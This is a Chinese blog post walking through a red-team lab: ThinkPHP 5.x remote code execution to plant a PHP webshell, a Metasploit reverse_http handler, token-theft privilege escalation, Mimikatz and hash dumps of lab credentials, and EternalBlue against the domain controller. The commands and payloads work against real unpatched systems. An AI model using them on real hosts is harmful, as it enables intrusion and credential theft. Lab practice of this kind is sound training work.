ATT&CK(五)

最新推荐文章于 2025-11-02 10:19:56 发布
原创 最新推荐文章于 2025-11-02 10:19:56 发布 · 553 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #系统安全 #web安全

ATT&CK(五)

描述

虚拟机密码

win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

红队思路

一、环境搭建

  • 1.环境搭建测试

  • 2.信息收集

二、漏洞利用

  • 3.漏洞搜索与利用

  • 4.漏洞利用Getshell

  • 5.系统信息收集

  • 6.主机密码收集

三、内网搜集

  • 7.内网–继续信息收集

  • 8.内网攻击姿势–MS14-058

  • 9.内网攻击姿势–MS17-010

四、横向移动

  • 10.psexec远控

  • 11.内网其它主机端口

  • 12.netsh增删防火墙规则

五、构建通道

  • 13.内网其它主机端口-代理转发

六、持久控制

  • 14.域渗透-域成员信息收集

  • 15.域渗透-基础服务弱口令探测及深度利用之powershell

  • 16.域渗透-横向移动[wmi利用]

  • 17.域渗透-域控实现与利用

七、痕迹清理

  • 18、日志清理

环境配置

将Windows 7和Windows 2008绑在这个VMnet1上。除此之外,还需要给Windows 7 新增一个网卡,并设置为桥接模式。最终Windows 7具有两个网卡,分别连通内外网,而Windows 2008只有一个网卡连接,处于内网无法与外网通信。

整个靶场环境大致如下:

图片

外网渗透

nmap -sS -p 1-65535 -A 192.168.135.150

发现80,135,3306端口

先看80端口

image-20230819105236493

thinkphp v5.x远程命令执行

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_GET["code"])?^>>shell.php

成功上传webshell,

提权

可以在shell.php的路径下上传免杀

CS上线

cs派生msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.135.128
set lport 7725
run

image-20230819113037429

image-20230819113203679

image-20230819113215374

image-20230819113227564

收集信息

查看本机内网与外网ip

image-20230819112321124

发现两个网段,135是外网,138是内网

想要获取本机密码,权限不够尝试提权

提权
令牌窃取提权
load incognito                 加载incognito(伪装)
getuid                         查看当前token
list_tokens -u                 列出可用token,顺便查看一下域
impersonate_token "NT AUTHORITY\\SYSTEM"   token窃取,格式为impersonate_token	"主机名\\用户名"

rev2self                       返回之前的token

image-20230819113737035

使用svc-exe进行提权

上线SYSTEM

横向渗透

收集信息

mimikatz获取本机密码

Authentication Id : 0 ; 351639 (00000000:00055d97)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : SUN
Logon Server      : DC
Logon Time        : 2023/8/19 10:19:22
SID               : S-1-5-21-3388020223-1982701712-4030140183-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SUN
	 * LM       : c8c42d085b5e3da2e9260223765451f1
	 * NTLM     : e8bea972b3549868cecd667a64a6ac46
	 * SHA1     : 3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
	tspkg :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : dc123.com
	wdigest :	
	 * Username : Administrator
	 * Domain   : SUN
	 * Password : dc123.com
	kerberos :	
	 * Username : Administrator
	 * Domain   : SUN.COM
	 * Password : dc123.com

探测内网存活主机

[08/19 12:06:03] [+] received output:
192.168.138.1

[08/19 12:06:10] [+] received output:
192.168.138.136		本机
192.168.138.138		域

抓取hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
heart:1000:aad3b435b51404eeaad3b435b51404ee:a34efdd63a23abea4413ba73cafa5a30:::

SMB横向

先创建一个SMB监听器

image-20230513165136801

image-20230819141938751

域管上线

image-20230819142203799

ms17-010 尝试

use windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
options
set rhost 192.168.138.138
run

image-20221002204656612

这里可以很明显的看到,靶机存在永恒之蓝但是 session 反弹不成功,这里是因为 windows server2008 的情况下匿名管道是默认不开启的,我们知道 psexec 的原理就是使用了管道,ipc 连接也是同理,那么在匿名管道不开的情况下永恒之蓝的连接是建立不上的

匿名管道的概念
管道是ipc最基本的一种实现机制,在linux下一切皆文件 其实这里的管道其实就是一个文件.管道实现进程通信就是让两个进程都能访问该文件

管道的特征
只能提供单向通信,也就是说进程都能访问这个文件,假设进程1往文件里写东西,那么进程2就只能读取文件的内容
只能用于具有血缘关系的进程间进行通信,通常用于父子进程间通信
管道是依赖于字节流来通信的
依赖于文件系统,它的声明周期随进程的结束结束(随进程)
其本身自带同步互斥效果
ATT&CK
2301_78043557的博客
09-16 1018
MITRE ATT&CK 不是一个标准,而是一个知识框架。它本身不能直接帮你防御,但它为你提供了思考的框架、交流的语言和行动的路线图。它让防御者能够站在攻击者的角度思考问题,从而构建出更加有效和全面的防御体系。它是现代网络安全领域的基石之一。
ATT&CK】MITRE ATT&CK 设计与哲学
xqdd的专栏
11-10 640
ATT&CK组织在一系列“技术领域”中——生态系统是对手在提供对手必须规避或采取的一系列约束的范围内作战完成一系列目标的优势。到目前为止,MITRE已经定义了三种技术domains–Enterprise(代表传统的企业网络和云技术),移动(用于移动通信设备)和ICS(用于工业控制系统)。在内部每个技术领域,ATT&CK都定义了多个“平台”,即对手所在的系统在内部操作。平台可以是操作系统或应用程序(例如Microsoft Windows)。技术和子技术可以应用于多个平台。表1列出了目前为ATT&CK技术领域定
ATT&CK框架
热门推荐
qq_40216188的博客
02-28 2万+
ATT&CK框架一、ATT&CK框架1.1、侦查Reconnaissance-包含10项技术1.2、资源开发Resource Development-包含6项技术1.3、初始访问Initial Access-包含9项技术 一、ATT&CK框架 序号 战术 战术功能 1 侦察 信息收集 2 资源开发 建立攻击者行动所需资源 3 初始访问 进入目标网络,获取一个入口 4 执行 运行恶意代码 5 持久化 保持攻击立足点 6 权限提升 获取最高权限 7
ATT&CK】简介
吉吉的博客
08-22 3335
ATT&CK 模型简介,相关知识,应用场景,攻击者和防守方的利用
学习黑客 ATT&CK
qq_41179365的博客
05-04 875
ATT&CK 为“游戏图鉴”:每掌握一招技术 = 收到一张怪物卡;每补齐一格检测 = 给自己加一层护盾。祝你在这片攻防大陆越练越强,打怪升级永不 AFK!
EDR与MITRE ATT&CK 详解
hj06112的博客
09-19 785
主要目前网络主要的攻击和防御框架
ATT&CK初学习
qzhqbb的博客
08-20 526
威胁情报(IOC)是观察到的计算机被入侵的痕迹,如病毒哈希值或控制服务器的IP地址。ATT&CK框架是近年来流行的网络安全框架,用于描述攻击者的战术、技术和过程。框架包含多种技术和概念,旨在帮助安全专业人员更好地理解网络攻击的本质。威胁情报的收集和整理有助于制定更有效的安全策略,防范未来的攻击。
ATT&CK的核心组件定义
sinat_33203678的博客
04-23 1081
含义:一般为网络流量中或者操作系统上观察到的能高度表明计算机被入侵的痕迹.将这些特征收集整理为库,下次再表现如此特征就确定计算机已经被入侵了.
ATT&CK学习笔记
mainjay
03-29 1412
ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge),是一个由MITRE公司开发的开源框架,用于描述和分类黑客攻击的战术、技术和常见知识。该框架包含了各种攻击者可能使用的技术和方法,包括渗透测试、间谍活动、勒索软件和其他恶意软件攻击等。ATT&CK框架将这些攻击方法按照攻击者的行为分为不同的阶段,包括初始访问、执行、持久化、凭证访问、发现、横向移动、收集、指令与控制与漏洞利用等。
深入理解 APT 与 ATT&CK 框架
「威胁棱镜」—— 以攻击者视角构建企业级防御体系 本博客聚焦高级威胁对抗(APT) 与 实战化防御工程 领域,致力于解构攻击技术本质,探索可落地的自动化防护方案。作者深耕ATT&CK框架应用、云原生安全架构、终端检测响应(EDR)深度防御。
06-05 1779
ATT&CK 框架的价值在于将 攻击者视角 转化为 防御路线图。通过本文的代码示例,读者可快速构建基于行为的 APT 检测能力。持续跟踪 MITRE 的更新(如 ICS、云矩阵)是应对新型 APT 的关键。
ATT&CK手册(修改版)
09-16
**ATT&CK手册(修改版)** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由美国非营利组织MITRE Corporation开发的一种框架,用于描述和分类网络攻击者的行为战术、技术和过程(TTPs)。这个框架...
ATT-CK-CN:ATT&CK实操
02-05
ATT&CK框架是一种知识库,收集了各种先进持续威胁(APT)组织的已知攻击行为,为安全专业人员提供了对这些攻击手段的理解和防御策略。 【标签】: 1. security:网络安全是整个讨论的核心,包括网络防御策略和最佳...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK手册.pdf
09-20
本手册涉及的核心概念是ATT&CK模型,这是一种由MITRE Corporation开发的攻击框架,用于对攻击者在渗透和入侵过程中使用的手法、技术和程序进行分类和描述。ATT&CK手册将网络安全的视角从防御转向了攻击者的行为,为...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8804
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
OAuth 2.0 安全授权
qq_33807380的博客
10-30 626
OAuth 2.0 是一个授权框架,它允许第三方应用程序在获得用户授权后,代表用户访问该用户在另一个服务提供商上存储的资源,而无需分享用户的密码。重要区别:OAuth 2.0 是关于授权,而非认证。认证:是确认“你是谁”的过程。(例如:用账号密码登录)授权:是确认“你被允许做什么”的过程。(例如:授权一个App来管理你的QQ邮箱)
HTTPS:现代网站运营的安全基石与价值引擎
最新发布
dexunyun的博客
11-02 467
在数据成为核心资产的时代,HTTPS已超越技术范畴,成为网站与用户之间的信任契约。它不仅在保护数据传输安全扮演着不可或缺的角色,更通过提升用户体验、优化搜索排名、满足合规要求,为企业构建起可持续增长的数字生态。对于现代网站运营者而言,部署HTTPS不再是选择题,而是关乎生存与发展的必答题。唯有以安全为基石,方能在数字化浪潮中行稳致远。
Rust 入门基础:安全、并发与高性能的系统编程语言
代码改善世界的博客
10-29 612
Rust 是一种旨在提供内存安全、并发安全,同时不失高性能的现代系统编程语言。它通过独特的所有权系统、借用检查器和生命周期概念,在编译阶段即可消除绝大部分内存错误和数据竞争问题,从而无需垃圾回收机制即可保证安全。这使得 Rust 在系统编程、Web Assembly、命令行工具和网络服务等领域的应用日益广泛。对于开发者而言,学习 Rust 不仅是掌握一门新语言,更是拥抱一种以安全为前提构建高效、可靠软件的新范式。
att&ck
07-22
MITRE ATT&CK框架是一个基于观察到的攻击行为的知识库,它将攻击生命周期中的不同阶段分类为战术和技术。这个框架最初是为了帮助防御者更好地理解攻击者的行为模式而设计的,但它也被广泛应用于红队演练、攻击模拟...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值